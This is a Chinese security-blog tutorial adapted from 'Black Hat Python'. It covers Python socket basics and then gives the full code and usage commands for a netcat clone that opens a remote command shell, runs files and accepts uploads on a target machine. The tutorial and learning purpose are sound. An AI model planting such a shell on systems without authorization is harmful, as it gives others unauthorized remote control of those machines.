BlackHat Python之socket编程和简单的netcat

2015-12-10 12,041

没什么比python更时候来做hacking了,一个初学者看完本篇就能马上能够自己写一个netcat!!!嘻嘻。

(本文代码来自《black hat python》,目前没有中文版,看的人也不多,本人对代码稍加整理,改写和测试,再结合一些基础知识的补充,希望对大家有所帮助)

0x01、Socket 类型

套接字格式:

socket(family,type[,protocal]) 使用给定的地址族、套接字类型、协议编号(默认为0)来创建套接字。

socket类型 描述
socket.AF_UNIX 只能够用于单一的Unix系统进程间通信
socket.AF_INET 服务器之间网络通信
socket.AF_INET6 IPv6
socket.SOCK_STREAM 流式socket , for TCP
socket.SOCK_DGRAM 数据报式socket , for UDP
socket.SOCK_RAW 原始套接字,普通的套接字无法处理ICMP、IGMP等网络报文,而SOCK_RAW可以;其次,SOCK_RAW也可以处理特殊的IPv4报文;此外,利用原始套接字,可以通过IP_HDRINCL套接字选项由用户构造IP头。
socket.SOCK_SEQPACKET 可靠的连续数据包服务
创建TCP Socket: s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
创建UDP Socket: s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)

0x02、Socket 函数

注意点:

1)TCP发送数据时,已建立好TCP连接,所以不需要指定地址。UDP是面向无连接的,每次发送要指定是发给谁。

2)服务端与客户端不能直接发送列表,元组,字典。需要字符串化repr(data)。

socket函数 描述
服务端socket函数
s.bind(address) 将套接字绑定到地址, 在AF_INET下,以元组(host,port)的形式表示地址.
s.listen(backlog) 开始监听TCP传入连接。backlog指定在拒绝连接之前,操作系统可以挂起的最大连接数量。该值至少为1,大部分应用程序设为5就可以了。
s.accept() 接受TCP连接并返回(conn,address),其中conn是新的套接字对象,可以用来接收和发送数据。address是连接客户端的地址。
客户端socket函数
s.connect(address) 连接到address处的套接字。一般address的格式为元组(hostname,port),如果连接出错,返回socket.error错误。
s.connect_ex(adddress) 功能与connect(address)相同,但是成功返回0,失败返回errno的值。
公共socket函数
s.recv(bufsize[,flag]) 接受TCP套接字的数据。数据以字符串形式返回,bufsize指定要接收的最大数据量。flag提供有关消息的其他信息,通常可以忽略。
s.send(string[,flag]) 发送TCP数据。将string中的数据发送到连接的套接字。返回值是要发送的字节数量,该数量可能小于string的字节大小。
s.sendall(string[,flag]) 完整发送TCP数据。将string中的数据发送到连接的套接字,但在返回之前会尝试发送所有数据。成功返回None,失败则抛出异常。
s.recvfrom(bufsize[.flag]) 接受UDP套接字的数据。与recv()类似,但返回值是(data,address)。其中data是包含接收数据的字符串,address是发送数据的套接字地址。
s.sendto(string[,flag],address) 发送UDP数据。将数据发送到套接字,address是形式为(ipaddr,port)的元组,指定远程地址。返回值是发送的字节数。
s.close() 关闭套接字。
s.getpeername() 返回连接套接字的远程地址。返回值通常是元组(ipaddr,port)。
s.getsockname() 返回套接字自己的地址。通常是一个元组(ipaddr,port)
s.setsockopt(level,optname,value) 设置给定套接字选项的值。
s.getsockopt(level,optname[.buflen]) 返回套接字选项的值。
s.settimeout(timeout) 设置套接字操作的超时期,timeout是一个浮点数,单位是秒。值为None表示没有超时期。一般,超时期应该在刚创建套接字时设置,因为它们可能用于连接的操作(如connect())
s.gettimeout() 返回当前超时期的值,单位是秒,如果没有设置超时期,则返回None。
s.fileno() 返回套接字的文件描述符。
s.setblocking(flag) 如果flag为0,则将套接字设为非阻塞模式,否则将套接字设为阻塞模式(默认值)。非阻塞模式下,如果调用recv()没有发现任何数据,或send()调用无法立即发送数据,那么将引起socket.error异常。
s.makefile() 创建一个与该套接字相关连的文件

0x03、socket编程思路

TCP服务端:

import socket
import threading

bind_ip = "0.0.0.0"
bind_port = 9999

server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((bind_ip, bind_port))
server.listen(5)
print("[*] Listening on %s:%d" % (bind_ip, bind_port))


def handle_client(client_socket):
    request = client_socket.recv(1024)
    print("[*] Received: %s" % request)
    client_socket.send("ACK!")
    client_socket.close()


while True:
    client, addr = server.accept()
    print("[*] Accepted connection from: %s:%d" % (addr[0], addr[1]))
    client_handler = threading.Thread(target=handle_client, args=(client, ))
    client_handler.start()

看不太懂的对照下上面表格,其实很简单,这边开启了个tcp服务器,只用3行有木有socket(新建),bind(绑定),listen(监听),够帅气吧,然后就是等待客户端的链接啦。

TCP客户端:

import socket

target_host = "127.0.0.1"
target_port = 9999

client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((target_host, target_port))
client.send("Hello world!")
response = client.recv(4096)
print(response)

好的,这里就是客户端啦,给服务器发送个hello world打个招呼, 然后就能接受到服务端的返回了。
大家分别在本机执行下服务端和客户端的命令,就能看到他们的简单交互。
很简单对吧。然后接下来是我们的大菜!

NetCat:

#!/usr/bin/env python
# -*-coding = utf-8-*-

import sys
import socket
import threading
import subprocess
import argparse

listen = False
command = False
upload = False
execute = ""
target = ""
upload_destination = ""
port = 0


def main():
    global listen
    global port
    global execute
    global command
    global upload_destination
    global target

    parser = argparse.ArgumentParser(description="BHP Net Tool")
    parser.add_argument("-t", "--target", help="the ip or domain of target", default="0.0.0.0")
    parser.add_argument("-p", "--port", help="the port of ftp", default=0)
    parser.add_argument("-l", "--listen", action="store_true", help="listen on [host]:[port] for incoming connections")
    parser.add_argument("-e", "--execute", help="execute the given file upon receiving a connection")
    parser.add_argument("-c", "--command", action="store_true", help='initialize a command shell')
    parser.add_argument("-u", "--upload", help="upon receiving connection upload a file and write to [destination]")
    args = parser.parse_args()

    listen = args.listen
    command = args.command
    target = args.target
    port = int(args.port)
    if args.upload:
        upload_destination = args.upload
    if args.execute:
        execute = args.execute

    if listen:
        server_loop()
    elif port > 0:
        _buffer = sys.stdin.read()
        client_sender(_buffer)
    else:
        print("[*]noting to do")


def client_sender(_buffer):
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        client.connect((target, port))
        if len(_buffer):
            client.send(_buffer)
        while True:
            recv_len = 1
            response = ""

            while recv_len:
                data = client.recv(4096)
                recv_len = len(data)
                response += data

                if recv_len < 4096:
                    break
            print(response)
            _buffer = raw_input("> ")
            _buffer += "\n"
            client.send(_buffer)
    except Exception as e:
        print(e)
        print("[*] Exception! Exiting.")
        client.close()


def server_loop():
    global target
    global port

    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind((target, port))
    server.listen(5)
    print("[*] start BHP server [{}:{}]!".format(target, port))
    while True:
        client_socket, addr = server.accept()

        client_thread = threading.Thread(target=client_handler, args=(client_socket,))
        client_thread.start()


def run_command(_command):
    _command = _command.rstrip()

    try:
        output = subprocess.check_output(_command, stderr=subprocess.STDOUT, shell=True)
    except:
        output = "Failed to execute command.\r\n"

    return output


def client_handler(client_socket):
    global upload
    global execute
    global command

    print('[-] get a connect!')
    if len(upload_destination):
        file_buffer = ""

        while True:
            data = client_socket.recv(1024)
            if not data:
                break
            else:
                file_buffer += data

        try:
            file_descriptor = open(upload_destination, "wb")
            file_descriptor.write(file_buffer)
            file_descriptor.close()

            client_socket.send("Successfully saved file to %s\r\n" % upload_destination)
        except:
            client_socket.send("Failed to save file to %s\r\n" % upload_destination)

    if len(execute):
        output = run_command(execute)
        client_socket.send(output)

    if command:
        while True:
            client_socket.send("<BHP:#> ")
            cmd_buffer = ""
            while "\n" not in cmd_buffer:
                cmd_buffer += client_socket.recv(1024)

            response = run_command(cmd_buffer)
            client_socket.send(response)


if __name__ == "__main__":
    main()

好了,就这么多代码。比上面稍微复杂一点,这边用到了argparse模块,用来获取脚本数据,大家写脚本经常会用到的。这样我们就只要这一个脚本,就能在目标反弹一个shell到本机哦。
主要思路就是在目标建立一个tcp服务器,大家应该很熟练了,然后接受到我们tcp客户端发送的信息当作shell命令执行,然后把输出结果再返回给客户端。

大家可以把脚本保存成bhpnet.py,添加下运行权限,在本机运行测试。

bhpnet.py -t 0.0.0.0 -p 5555 -l -c (目标)
bhpnet.py -t 127.0.0.1 -p 5555  然后按ctrl+D就能进行shell的交互了。

是不是很神奇。大家快试试吧。

【本文由0x5010 投递安全脉搏 转载请注明来源安全脉搏】

本文作者:0x5010

本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/40819.html

Tags:
评论  (0)
快来写下你的想法吧!

0x5010

文章数:1 积分: 2

安全问答社区

安全问答社区

脉搏官方公众号

脉搏公众号